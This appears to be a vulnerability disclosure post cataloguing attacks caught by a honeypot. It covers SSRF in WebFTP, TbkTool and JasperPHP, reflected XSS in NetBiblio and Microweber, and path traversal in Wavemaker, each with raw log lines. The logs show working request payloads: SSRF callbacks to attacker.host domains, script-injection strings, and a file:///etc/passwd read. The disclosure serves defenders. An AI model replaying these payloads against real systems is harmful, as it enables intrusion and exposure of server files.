WebFTP /Api-back.php Multiple Parameter SSRF

A honeypot at a client site caught these being exploited in the wild on 2022-08-09. The script is found in WebFTP, in /Api-back.php. The ‘newname’ and ‘files’ parameters are vulnerable.

REDACTED - - [20/Sep/2022:16:41:09 -0400] "POST /Api-back.php?newname=https%3A%2F%2F53678222-4159-46d0-b4b9-5067142a33c3.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 741 "scalaj-http/2.4.2"
REDACTED - - [20/Sep/2022:19:16:11 -0400] "POST /Api-back.php?files=https%3A%2F%2F303841cc-6c1b-4c99-a6f5-5f1f73f3ae66.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 734 "scalaj-http/2.4.2"

TbkTool Multiple Server-side Request Forgery (SSRF)

A honeypot at a client site caught these being exploited in the wild on 2022-08-09. They are scripts found in TbkTool which is a Chinese Taobao guest toolbox (Google translated).

TbkTool /admin/AutoCreat-Zjy-TklRead-do.php autozjy_tkl Parameter SSRF

REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/AutoCreat-Zjy-TklRead-do.php?autozjy_tkl=https%3A%2F%2Fe919655e-f13c-4d6a-bcea-bba87c4ed230.attacker.host HTTP/1.1" 404 734 "scalaj-http/2.4.2"

TbkTool /admin/Creat-ActiveZjy-do.php Multiple Parameter SSRF

REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/Creat-ActiveZjy-do.php?active_dwzapi=https%3A%2F%2F9b08b39f-d677-4747-b449-06f4366f51f7.attacker.host HTTP/1.1" 404 737 "scalaj-http/2.4.2"
REDACTED - - [09/Aug/2022:19:01:40 -0400] "POST /admin/Creat-ActiveZjy-do.php?active_yuming=https%3A%2F%2F879efee5-7942-4b3f-933d-95148e943dd9.attacker.host HTTP/1.1" 404 773 "scalaj-http/2.4.2"

TbkTool /admin/Creat-Zjy-do.php Multiple Parameter SSRF

REDACTED - - [09/Aug/2022:19:01:41 -0400] "POST /admin/Creat-Zjy-do.php?zjy_dwzapi=https%3A%2F%2F92700472-5b5a-4431-a9da-7b7bc11ce379.attacker.host HTTP/1.1" 404 737 "scalaj-http/2.4.2"
REDACTED - - [09/Aug/2022:19:01:41 -0400] "POST /admin/Creat-Zjy-do.php?zjy_yuming=https%3A%2F%2F3022c03f-2c8d-49dd-8147-ce4ef2b20491.attacker.host HTTP/1.1" 404 737 "scalaj-http/2.4.2"

JasperPHP /TJasper.class.php report Parameter Server-side Request Forgery (SSRF)

A honeypot at a client site caught this being exploited in the wild on 2022-08-09. The server-side request forgery (SSRF) flaw is in JasperPHP a “Pure PHP library to read JRXML files made in “JasperSoft Studio” and generate reports in PDF/XLS“.

REDACTED - - [09/Aug/2022:19:01:38 -0400] "GET /TJasper.class.php?report=https%3A%2F%2F505e8e67-4d55-4bc3-93dd-9d6f058c9bb0.attacker.host HTTP/1.1" 404 731 "scalaj-http/2.4.2"

NetBiblio /NetBiblio/search/shortviewNetBiblio searchTerm Parameter Reflected XSS

A honeypot at a client site caught this being exploited in the wild on 2023-05-26. The vulnerability is in NetBiblio “an integrated IT solution for libraries, media centers, documentation centers and archives“.

REDACTED - - [26/May/2023:13:31:24 -0600] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple HTTP/1.1" 404 773 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"

Microweber /demo/api/logout redirect_to Parameter XSS

A honeypot at a client site caught this being exploited in the wild on 2023-05-26. CVE-2022-0560 was assigned a year ago for the same script and parameter but for an open redirect so this is different. That vulnerability was fixed in version 1.2.11 but not sure if this was fixed as a result.

REDACTED - - [26/May/2023:13:19:56 -0600] "GET /demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"

Wavemaker Studio /studioService.download inUrl Parameter Path Traversal Remote File Disclosure

A honeypot at a client site caught this being exploited in the wild on May 6, 2023. It appears to be a vulnerability in Wavemaker and does not appear in CVE. Since this was discovered in the wild and we don’t have time to check each issue we’re not sure what versions are affected.

[redacted] - - [06/May/2023:04:23:46 -0600] "GET /wavemaker/studioService.download?inUrl=file///etc/passwd&method=getContent HTTP/1.1" 404 731 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"